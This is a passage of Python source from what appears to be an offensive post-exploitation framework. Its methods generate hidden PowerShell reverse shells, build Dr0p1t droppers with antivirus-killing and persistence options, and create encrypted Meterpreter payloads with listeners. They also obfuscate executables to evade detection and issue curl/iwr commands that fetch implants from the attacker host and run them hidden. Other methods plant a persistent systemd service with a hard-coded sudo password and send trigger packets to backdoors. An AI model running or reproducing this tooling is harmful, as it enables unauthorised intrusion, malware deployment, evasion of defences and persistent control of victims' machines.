            command = f"Start-Process $PSHOME\\powershell.exe -ArgumentList {{-ep bypass -nop $client = New-Object System.Net.Sockets.TCPClient('{ip}',{port});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{{0}};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}};$client.Close()}} -WindowStyle Hidden"
        else:
            print_error("Invalid selection.")
            return

        print_msg(f"Generated {shell_options[choice]} Reverse Shell:\n{command}")
        copy2clip(command)
        return

    def do_dr0p1t(self, line):
        """
        Execute the Dr0p1t tool to create a stealthy malware dropper.

        This function prompts the user to input the necessary parameters for
        generating a dropper, including the malware URL, persistence options,
        and additional configurations. Based on the user's input, it constructs
        the command and executes it.

        :param line: Not used in this implementation.
        :returns: None
        """
        if not is_binary_present("Dr0p1t.py"):
            print_warn("Dr0p1t.py not found. Installing...")
            command = "cd && git clone https://github.com/D4Vinci/Dr0p1t-Framework.git && cd Dr0p1t-Framework && chmod +x install.sh && ./install.sh"
            self.cmd(command)
        lhost = self.params['lhost']
        malware_url = input("    [!] Enter the malware URL (e.g., https://example.com/malware.exe): ").strip() or f"http://{self.params['lhost']}/shell.elf"
        if not malware_url:
            print_error("Malware URL is required.")
            return

        persistence_options = {
            "1": "--runas",
            "2": "-s",
            "3": "-t",
            "4": "-a"
        }

        print_msg("Choose persistence options for the dropper:")
        for key, value in persistence_options.items():
            print_msg(f"{key}. {value}")

        choice = input("    [!] Enter your choice (1-4, or leave blank for none): ").strip()
        persistence_command = ""
        if choice in persistence_options:
            persistence_command = persistence_options[choice]

        kill_av = input("    [!] Kill antivirus before execution? (y/n, default: n): ").strip().lower() or 'n'
        if kill_av == 'y':
            kill_av_command = "-k"
        else:
            kill_av_command = ""

        run_script = input("    [!] Run a batch script before running the malware (optional): ").strip()
        if run_script:
            run_script_command = f"-b {run_script}"
        else:
            run_script_command = ""

        icon = input("    [!] Use an icon for the final file (optional, path to icon): ").strip()
        if icon:
            icon_command = f"-i {icon}"
        else:
            icon_command = ""

        command = f"cd && cd Dr0p1t-Framework && python3 Dr0p1t.py {malware_url} {persistence_command} {kill_av_command} {run_script_command} {icon_command}".strip()

        print_msg(f"Generated command: {command}")
        self.cmd(command)
        return

    def do_paranoid_meterpreter(self, line):
        """
        Creates and deploys a paranoid Meterpreter payload and listener with SSL/TLS pinning and UUID tracking.

        This function performs the following actions:
        1. Generates a self-signed SSL/TLS certificate for payload encryption.
        2. Creates either staged or stageless Meterpreter payloads with UUID tracking and TLS pinning.
        3. Configures and launches a Metasploit listener for the payload.

        Parameters:
        line (str): Command arguments specifying target configurations.
                    Expected format:
                        - self.params['rhost'] self.params['lhost'] self.params['domain'] subdomain

        Returns:
        None
        """
        lhost = self.params['lhost']
        lport = self.params['lport']
        domain = self.params['domain']
        subdomain = self.params['subdomain']

        cert_name = f"sessions/{subdomain}.{self.params['domain']}"
        print_msg(f"Creating SSL certificate for {cert_name}")
        cert_command = (
            f"openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 "
            f"-subj '/C=US/ST=Texas/L=Austin/O=Development/CN={subdomain}.{self.params['domain']}' "
            f"-keyout {cert_name}.key -out {cert_name}.crt && "
            f"cat {cert_name}.key {cert_name}.crt > {cert_name}.pem && "
            f"rm -f {cert_name}.key {cert_name}.crt"
        )
        print_msg(cert_command)
        self.cmd(cert_command)
        if not line:
            choice = input("Would you like a staged or stageless payload? (Enter 'staged' or 'stageless'): ").strip().lower()
        else:
            choice = line.strip()

        if choice == 'staged':
            staged_payload_command = (
                f"msfvenom -p windows/meterpreter/reverse_winhttps LHOST={self.params['lhost']} LPORT={lport} "
                f"PayloadUUIDTracking=true HandlerSSLCert=./{cert_name}.pem "
                f"StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH "
                f"-f exe -o sessions/launch-paranoid.exe && upx sessions/launch-paranoid.exe"
            )
            print_msg(f"Generating staged Meterpreter payload for {self.params['lhost']}")
            print_msg(staged_payload_command)
            self.cmd(staged_payload_command)

            listener_staged_command = (
                f"msfconsole -q -x 'use exploit/multi/handler; "
                f"set PAYLOAD windows/meterpreter/reverse_winhttps; "
                f"set LHOST {self.params['lhost']}; set LPORT {lport}; set HandlerSSLCert ./{cert_name}.pem; "
                f"set IgnoreUnknownPayloads true; set StagerVerifySSLCert true; run -j'"
            )
            print_msg("Starting Metasploit listener for staged payload")
            print_msg(listener_staged_command)
            self.cmd(listener_staged_command)
            self.logcsv(f"paranoid_meterpreter {listener_staged_command}")
        elif choice == 'stageless':
            stageless_payload_command = (
                f"msfvenom -p windows/meterpreter_reverse_https LHOST={self.params['lhost']} LPORT={lport} "
                f"PayloadUUIDTracking=true HandlerSSLCert=./{cert_name}.pem "
                f"StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedStageless "
                f"-f exe -o sessions/launch-paranoid-stageless.exe && upx sessions/launch-paranoid-stageless.exe"
            )
            print_msg(f"Generating stageless Meterpreter payload for {self.params['lhost']}")
            print_msg(stageless_payload_command)
            self.cmd(stageless_payload_command)

            listener_stageless_command = (
                f"msfconsole -q -x 'use exploit/multi/handler; "
                f"set PAYLOAD windows/meterpreter_reverse_https; "
                f"set LHOST {self.params['lhost']}; set LPORT {lport}; set HandlerSSLCert ./{cert_name}.pem; "
                f"set IgnoreUnknownPayloads true; set StagerVerifySSLCert true; run -j'"
            )
            print_msg("Starting Metasploit listener for stageless payload")
            print_msg(listener_stageless_command)
            self.cmd(listener_stageless_command)
            self.logcsv(f"paranoid_meterpreter {listener_stageless_command}")
        else:
            print_msg("Invalid choice. Please enter 'staged' or 'stageless'.")
            return

        print_msg("Paranoid Meterpreter payload and listener created successfully.")
        return

    def do_setoolKits(self, line):
        """
        Executes the SEToolKit workflow to generate a Meterpreter payload
        and configure the multi-handler using LHOST and LPORT from self.params.

        Usage:
            do_setoolKits

        Arguments:
            None: LHOST and LPORT are retrieved from self.params.

        Workflow:
            1. Launches SEToolKit.
            2. Navigates to option 1 (Social-Engineering Attacks).
            3. Selects option 9 (Powershell Alphanumeric Shellcode Injector).
            4. Configures LHOST and LPORT using values from self.params.
            5. Generates a Meterpreter reverse HTTPS payload.
            6. Configures a multi-handler to listen for incoming connections.
        """
        try:
            lhost = self.params['lhost']
            lport = self.params['lport']

            if not self.params['lhost'] or not lport:
                raise ValueError("LHOST and LPORT must be specified in self.params")

            print_msg(f"[*] SEToolKit configuring payload with LHOST={self.params['lhost']} and LPORT={lport}.")
            self.cmd("sudo setoolkit -q")
            self.logcsv("setoolKits setoolkit -q")
        except Exception as e:
            print_error(f"[!] Error: {e}")

    def do_darkarmour(self, line):
        """
        Uses the darkarmour tool to generate an undetectable version of a PE executable.

        This function performs the following actions:
        1. Verifies the presence of darkarmour; if not installed, it clones the repository and installs dependencies.
        2. Prompts the user for various options to customize the tool's behavior.
        3. Constructs a command to run darkarmour with the selected options.
        4. Executes darkarmour to generate the output file with the desired level of obfuscation.

        Parameters:
        line (str): Command line arguments for the tool.

        Returns:
        None
        """
        path = os.getcwd()
        sessions = f"{path}/sessions"
        darkarmour_git = "https://github.com/bats3c/darkarmour.git"
        darkarmour_path = os.path.join("external", ".exploit", "darkarmour")
        darkarmour_path = f"{path}/{darkarmour_path}"

        if not os.path.exists(darkarmour_path):
            print_warn("darkarmour is not installed. Cloning the repository and installing dependencies.")
            self.cmd(f"git clone {darkarmour_git} {darkarmour_path}")
            self.cmd("sudo apt install mingw-w64-tools mingw-w64-common g++-mingw-w64 gcc-mingw-w64 upx-ucl osslsigncode")
            print_msg("darkarmour installation completed.")


        file_input = input("    [!] Enter file to encrypt (default: 'sessions/shell64.exe'): ") or f"{sessions}/shell64.exe"
        encryption_method = input("    [!] Enter encryption method (default: 'xor'): ") or "xor"
        shellcode_file = input("    [!] Enter shellcode file (default: None): ") or None
        is_binary = input("    [!] Is the file a binary executable (default: 'yes')? (y/n): ") or "y"
        use_dll = input("    [!] Use reflective DLL injection (default: 'no')? (y/n): ") or "n"
        pack_upx = input("    [!] Pack the executable with UPX (default: 'yes')? (y/n): ") or "y"
        use_jmp = input("    [!] Use JMP-based PE loader (default: 'yes')? (y/n): ") or "y"
        use_runpe = input("    [!] Use RUNPE to load PE (default: 'no')? (y/n): ") or "n"
        is_source = input("    [!] Is the file C source code (default: 'no')? (y/n): ") or "n"
        encryption_key = input("    [!] Enter encryption key (default: None): ") or None
        loop_count = input("    [!] Enter number of encryption levels (default: '5'): ") or "5"
        output_file = input("    [!] Enter output file name (default: 'sessions/legit.exe'): ") or f"{sessions}/legit.exe"

        darkarmour_command = f"cd {darkarmour_path} && python3 {darkarmour_path}/darkarmour.py -f {file_input} --encrypt {encryption_method} "

        if shellcode_file:
            darkarmour_command += f"--shellcode {shellcode_file} "
        if is_binary.lower() == "y":
            darkarmour_command += "--binary "
        if use_dll.lower() == "y":
            darkarmour_command += "--dll "
        if pack_upx.lower() == "y":
            darkarmour_command += "--upx "
        if use_jmp.lower() == "y":
            darkarmour_command += "--jmp "
        if use_runpe.lower() == "y":
            darkarmour_command += "--runpe "
        if is_source.lower() == "y":
            darkarmour_command += "--source "
        if encryption_key:
            darkarmour_command += f"--key {encryption_key} "
        darkarmour_command += f"--loop {loop_count} -o {output_file}"

        print_msg(f"Running darkarmour with command: {darkarmour_command}")
        self.cmd(darkarmour_command)
        self.logcsv(f"darkarmour {darkarmour_command}")
        return

    def do_knokknok(self, line):
        """Send special string to trigger a reverse shell, with the command 'c2 client_name'
        create a listener shell script to drop the reverse shell in python3
        Args:
            line (str): input line not used

        Returns:
            None
        """
        HOST = self.params['rhost']
        if line:
            PORT = line.strip()
        else:
            PORT = self.params['rport']
        print_msg(f"KnokKnok backdoor on {HOST} {PORT}")
        especial_cadena = "grisiscomebacksayknokknok"
        try:
            client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            client_socket.connect((HOST, int(PORT)))
            client_socket.sendall(especial_cadena.encode('utf-8'))
            client_socket.close()
            print_msg("Who is ?")
        except Exception:
            print_error("Listener is not listen.")
        return

    def do_listener_go(self, line):
        """
        Configures and starts a listener for a specified victim.

        This function takes a command line input to configure and start a listener for a specified victim.
        The input should include the victim ID, the choice of listener type, and optionally the port numbers.
        The function then constructs the appropriate command to start the listener and assigns the necessary
        parameters.

        Args:
            line (str): The command line input containing the victim ID, listener type, and optional port numbers.

        Returns:
            None

        Raises:
            None

        Example:
            >>> listener_go victim1 2 1337 7777
        """
        if line:
            args = line.split()

            if len(args) == 1:
                line = args[0]
                choice = None
                print_error("1 You need to specify the victim-id, for example: listener victim. (1 win ps1 | 2 linux | 3 win bat) 1337 (port listener nc) ")
                return
            elif len(args) == 2:
                line = args[0]
                choice = args[1]
                port = '6666'
                listener = '7777'
            elif len(args) == 3:
                line = args[0]
                choice = args[1]
                port =  args[2]
                listener = '7777'
            elif len(args) == 4:
                line = args[0]
                choice = args[1]
                port =  args[2]
                listener = args[3]
            else:
                print_error("2 You need to specify the victim-id, for example: listener victim. (1 win ps1 | 2 linux | 3 win bat) 1337 remote listen ")
                return
        else:
            print_error("3 You need to specify the victim-id, for example: listener victim. (1 win ps1 | 2 linux | 3 win bat) 1337 remote listen 6666 (port listener nc) ")
            return

        lhost = self.params['lhost']
        implant_go2 = f"l_{line}_l.exe"
        if choice == "2":
            command = f"curl -o /home/grisun0/l_{line} http://{self.params['lhost']}/l_{line} && sudo -S chmod +x /home/grisun0/l_{line} && sudo -S nohup /home/grisun0/l_{line} & \\n"
        else:
            command = f"Start-Process powershell -ArgumentList \"-NoProfile -WindowStyle Hidden -Command `\"iwr -uri  http://{self.params['lhost']}/{implant_go2} -OutFile {implant_go2} ; .\\{implant_go2}`\"\""

        self.onecmd(f'assign rport {port}')
        self.onecmd(f'assign lport {port}')
        self.onecmd(f'assign listener {listener}')
        self.onecmd(f'c2 {line} {choice}')
        self.onecmd(f'ssh_cmd {command}')
        self.onecmd(f'nc {listener}')
        return

    def do_listener_py(self, line):
        """
        Configures and starts a listener for a specified victim.

        This function takes a command line input to configure and start a listener for a specified victim.
        The input should include the victim ID, the choice of listener type, and optionally the port numbers.
        The function then constructs the appropriate command to start the listener and assigns the necessary
        parameters.

        Args:
            line (str): The command line input containing the victim ID, listener type, and optional port numbers.

        Returns:
            None

        Raises:
            None

        Example:
            >>> listener_py victim1 2 1337 7777
        """
        if line:
            args = line.split()

            if len(args) == 1:
                line = args[0]
                choice = None
                print_error("1 You need to specify the victim-id, for example: listener victim. (1 win ps1 | 2 linux | 3 win bat) 1337 (port listener nc) ")
                return
            elif len(args) == 2:
                line = args[0]
                choice = args[1]
                port = '6666'
                listener = '7777'
            elif len(args) == 3:
                line = args[0]
                choice = args[1]
                port =  args[2]
                listener = '7777'
            elif len(args) == 4:
                line = args[0]
                choice = args[1]
                port =  args[2]
                listener = args[3]
            else:
                print_error("2 You need to specify the victim-id, for example: listener victim. (1 win ps1 | 2 linux | 3 win bat) 1337 remote listen ")
                return
        else:
            print_error("3 You need to specify the victim-id, for example: listener victim. (1 win ps1 | 2 linux | 3 win bat) 1337 remote listen 6666 (port listener nc) ")
            return

        lhost = self.params['lhost']

        if choice == "2":
            command = f"curl -o /home/.grisun0/l_{line}.sh http://{self.params['lhost']}/listener_{line}.sh && sudo -S chmod +x /home/.grisun0/l_{line}.sh && sudo -S nohup /bin/bash /home/.grisun0/l_{line}.sh & \\n"
        else:
            command = f"Start-Process powershell -ArgumentList \"curl -o l_{line}.sh http://{self.params['lhost']}/listener_{line}.sh ; chmod +x l_{line}.sh ; ./l_{line}.sh &\""

        self.onecmd(f'assign rport {port}')
        self.onecmd(f'assign lport {port}')
        self.onecmd(f'assign listener {listener}')
        self.onecmd(f'c2 {line} {choice}')
        self.onecmd(f'ssh_cmd {command}')
        self.onecmd(f'nc {listener}')
        return

    def do_service(self, line):
        """
        Creates a systemd service file for a specified binary and generates a script to enable and start the service.

        This function takes the name of a binary as input, creates a systemd service file for it, and generates a shell script
        to enable and start the service. The script is saved in the sessions directory and a command is provided to execute
        the script remotely via SSH.

        Args:
            line (str): The command line input containing the name of the binary. If an absolute path is not provided,
                        a default path is used.

        Returns:
            None

        Raises:
            None

        Example:
            >>> service my_binary_name
        """
        binary_name = line.strip()
        lhost = self.params['lhost']
        if not binary_name:
            print_error("No binary name provided.")
            return

        default_path = f"/home/.grisun0/services/{binary_name}"
        binary_path = default_path if not os.path.isabs(binary_name) else binary_name

        service_content = f"""#!/bin/bash
        SOURCE_FILE="{line}.service"
        cat > $SOURCE_FILE <<EOL
        [Unit]
        Description=My Custom Service for {binary_name}
        After=network.target

        [Service]
        ExecStart={binary_path}
        WorkingDirectory=/home/.grisun0/services
        StandardOutput=inherit
        StandardError=inherit
        Restart=always
        User=nobody

        [Install]
        WantedBy=multi-user.target
        EOL
        sudo cp {binary_name}.service /etc/systemd/system/{binary_name}.service &&
        sudo systemctl daemon-reload &&
        sudo systemctl start {binary_name} &&
        sudo systemctl enable {binary_name}
        """.replace('        ','')

        service_file_path = os.path.join(self.sessions_dir, f"{binary_name}_service.sh")

        try:
            with open(service_file_path, "w") as service_file:
                service_file.write(service_content)
            print_msg(f"Service file created at {service_file_path}")
        except Exception as e:
            print_error(f"Failed to create service file: {e}")
            return

        password = 'grisgrisgris'
        cmd = f"curl http://{self.params['lhost']}/{binary_name}_service.sh -o {binary_name}_service.sh && sudo -S chmod +x {binary_name}_service.sh && echo '{password}' | sudo -S bash {binary_name}_service.sh"
        print_msg(f"Run the following command to enable and start the service: {cmd}")

    def do_toctoc(self, line):
        """
        Sends a magic packet to the Chinese malware.
        The function extracts self.params['rhost'] and rport from self.params['rhost'] and self.params['rport'], respectively.
        """
        rhost = self.params['rhost']
        rport = self.params.get("rport")

        if not self.params['rhost'] or not rport:
            raise ValueError("self.params['rhost'] and rport must be specified in params")

        try:
            rport = int(rport)
        except ValueError:
            raise ValueError("rport must be an integer")

        magic_packet = struct.pack('!I4sH14s', 0xDEADBEEF, socket.inet_aton(self.params['rhost']), rport, b'justforfun')
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
            sock.sendto(magic_packet, (self.params['rhost'], rport))

        print_msg(f"Magic packet sent to {self.params['rhost']}:{rport}")

__all__ = [f"{phase.title()}CommandSet"]